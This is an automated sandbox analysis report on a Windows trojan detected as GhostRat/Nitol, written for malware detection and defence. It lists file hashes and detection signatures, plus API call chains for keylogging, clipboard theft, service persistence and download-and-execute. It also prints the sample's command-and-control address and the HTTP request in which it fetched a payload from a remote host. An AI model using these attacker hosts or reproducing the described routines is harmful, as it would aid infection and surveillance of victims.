Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe
Analysis ID:1520347
MD5:d46eb1527289a7937a29b51c5152c211
SHA1:ecc3d88cbcff257c989e1bc8bc0dee9f71a0d3fb
SHA256:c8f9d59dd94f5118e38f55a181a1c282080882b8b98338a46627de9884e8f784
Tags:exe
Infos:

Detection

GhostRat, Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries device information via Setup API
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
{"C2 url": "119.91.152.151"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_NitolYara detected NitolJoe Security
          Process Memory Space: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe PID: 5680JoeSecurity_GhostRatYara detected GhostRatJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.99228c.1.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.99228c.1.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
                0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.10000000.2.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.10000000.2.unpackJoeSecurity_NitolYara detected NitolJoe Security
                    0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.6d0000.0.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T08:34:41.654689+020028511791Malware Command and Control Activity Detected192.168.2.549729119.91.152.1518972TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 119.91.152.151Avira URL Cloud: Label: malware
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.99228c.1.raw.unpackMalware Configuration Extractor: GhostRat {"C2 url": "119.91.152.151"}
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeReversingLabs: Detection: 52%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: z:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: x:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: v:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: t:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: r:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: p:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: n:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: l:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: j:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: h:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: f:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: b:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: y:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: w:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: u:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: s:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: q:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: o:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: m:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: k:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: i:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: g:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: e:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: c:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile opened: [:Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10001ED0 _memset,SHGetSpecialFolderPathA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,_memmove,FindNextFileA,FindNextFileA,0_2_10001ED0

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2851179 - Severity 1 - ETPRO MALWARE PurpleFox Backdoor/Rootkit Checkin M2 : 192.168.2.5:49729 -> 119.91.152.151:8972
                      Source: Malware configuration extractorURLs: 119.91.152.151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 9652
                      Source: global trafficTCP traffic: 192.168.2.5:49724 -> 114.132.64.209:9652
                      Source: global trafficTCP traffic: 192.168.2.5:49729 -> 119.91.152.151:8972
                      Source: Joe Sandbox ViewASN Name: CNNIC-QCN-APQingdaoCableTVNetworkCenterCN CNNIC-QCN-APQingdaoCableTVNetworkCenterCN
                      Source: global trafficHTTP traffic detected: GET /mstsc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 114.132.64.209:9652Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 114.132.64.209
                      Source: unknownTCP traffic detected without corresponding DNS query: 114.132.64.209
                      Source: unknownTCP traffic detected without corresponding DNS query: 114.132.64.209
                      Source: unknownTCP traffic detected without corresponding DNS query: 114.132.64.209
                      Source: unknownTCP traffic detected without corresponding DNS query: 114.132.64.209
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10004470 fuckyou,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,GetVersionExA,GetVersionExA,GetVersionExA,LoadLibraryW,GetProcAddress,FreeLibrary,WaitForSingleObject,CloseHandle,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,GetModuleFileNameA,CopyFileA,Sleep,WaitForSingleObject,CloseHandle,ExitProcess,_memset,SHGetSpecialFolderPathA,_memset,_sprintf,GetFileAttributesA,GetModuleFileNameA,_sprintf,DefineDosDeviceA,Sleep,CopyFileA,SetFileAttributesA,_sprintf,ShellExecuteA,ExitProcess,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,_memset,_sprintf,lstrlenA,WaitForSingleObject,CloseHandle,Sleep,0_2_10004470
                      Source: global trafficHTTP traffic detected: GET /mstsc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 114.132.64.209:9652Connection: Keep-Alive
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.132.64.209/
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.0000000001208000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.000000000117E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://114.132.64.209:9652/mstsc.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://114.132.64.209:9652/mstsc.exeC:
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.000000000117E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.132.64.209:9652/mstsc.exeTx
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comX

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: <BackSpace>0_2_10004C50
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: <Enter>0_2_10004C50
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10002320 Sleep,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_10002320
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10002320 Sleep,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_10002320
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10001E10 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,0_2_10001E10
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10004C50 _memset,_memset,Sleep,lstrlenA,_memset,_memset,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcatA,_memset,lstrlenA,_memset,lstrcatA,0_2_10004C50
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_006FC600 GetKeyState,GetKeyState,GetKeyState,0_2_006FC600
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10002050: _memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,0_2_10002050
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_100062B0 OpenSCManagerA,OpenServiceA,DeleteService,GetSystemDirectoryA,lstrcatA,DeleteFileA,0_2_100062B0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10004090 LoadLibraryA,LoadLibraryA,GetProcAddress,_memset,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryA,GetProcAddress,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,FreeLibrary,0_2_10004090
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10002050 _memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,0_2_10002050
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_100054F0 ExitWindowsEx,0_2_100054F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_007F02800_2_007F0280
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_007045800_2_00704580
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_007EF6D00_2_007EF6D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_006D88000_2_006D8800
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_0090BBF00_2_0090BBF0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_008F5B400_2_008F5B40
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_100090A00_2_100090A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_1001227F0_2_1001227F
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_100127D00_2_100127D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10011D2E0_2_10011D2E
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10013DA20_2_10013DA2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10012EAC0_2_10012EAC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: String function: 0071F2E0 appears 587 times
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: String function: 006D3200 appears 37 times
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: String function: 006D2990 appears 58 times
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: String function: 008ECE70 appears 95 times
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: String function: 006D17E0 appears 60 times
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: String function: 008DE3A0 appears 794 times
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: String function: 0071E820 appears 38 times
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHosptialMan.EXEB vs SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeBinary or memory string: OriginalFilenameHosptialMan.EXEB vs SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.troj.spyw.winEXE@1/0@0/2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10002050 _memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,0_2_10002050
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10003160 _memset,lstrcpyA,lstrcpyA,lstrlenA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,lstrlenA,gethostname,lstrlenA,getsockname,GetVersionExA,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,_memset,GetLastInputInfo,GetTickCount,lstrlenA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,0_2_10003160
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: GetModuleFileNameA,ExpandEnvironmentStringsA,_strncmp,wsprintfA,CopyFileA,_memset,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlenA,RegSetValueExA,0_2_10003B50
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlenA,RegSetValueExA,0_2_10003CA8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10002930 _memset,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,lstrcatA,lstrcatA,lstrcatA,CloseHandle,lstrlenA,lstrcpyA,FreeLibrary,0_2_10002930
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_006D24A0 CoCreateInstance,OleRun,_com_issue_error,SysStringByteLen,SysAllocStringByteLen,_com_issue_error,VariantClear,VariantClear,VariantClear,InterlockedDecrement,SysFreeString,0_2_006D24A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_0070E580 FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,0_2_0070E580
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10004470 fuckyou,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,GetVersionExA,GetVersionExA,GetVersionExA,LoadLibraryW,GetProcAddress,FreeLibrary,WaitForSingleObject,CloseHandle,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,GetModuleFileNameA,CopyFileA,Sleep,WaitForSingleObject,CloseHandle,ExitProcess,_memset,SHGetSpecialFolderPathA,_memset,_sprintf,GetFileAttributesA,GetModuleFileNameA,_sprintf,DefineDosDeviceA,Sleep,CopyFileA,SetFileAttributesA,_sprintf,ShellExecuteA,ExitProcess,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,_memset,_sprintf,lstrlenA,WaitForSingleObject,CloseHandle,Sleep,0_2_10004470
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10004470 fuckyou,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,GetVersionExA,GetVersionExA,GetVersionExA,LoadLibraryW,GetProcAddress,FreeLibrary,WaitForSingleObject,CloseHandle,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,GetModuleFileNameA,CopyFileA,Sleep,WaitForSingleObject,CloseHandle,ExitProcess,_memset,SHGetSpecialFolderPathA,_memset,_sprintf,GetFileAttributesA,GetModuleFileNameA,_sprintf,DefineDosDeviceA,Sleep,CopyFileA,SetFileAttributesA,_sprintf,ShellExecuteA,ExitProcess,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,_memset,_sprintf,lstrlenA,WaitForSingleObject,CloseHandle,Sleep,0_2_10004470
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeMutant created: \Sessions\1\BaseNamedObjects\119.91.152.151:8972:Rsymwe miusskwq
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeReversingLabs: Detection: 52%
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeString found in binary or memory: If you use save/load state for MDI tabs, you must override this method in a derived class!
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeString found in binary or memory: If you use save/load state for MDI tabs, you should override this method in a derived class!
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeString found in binary or memory: OIf you use save/load state for MDI tabs, you must override this method in a derived class!
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: oledlg.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: propsys.dllJump to behavior
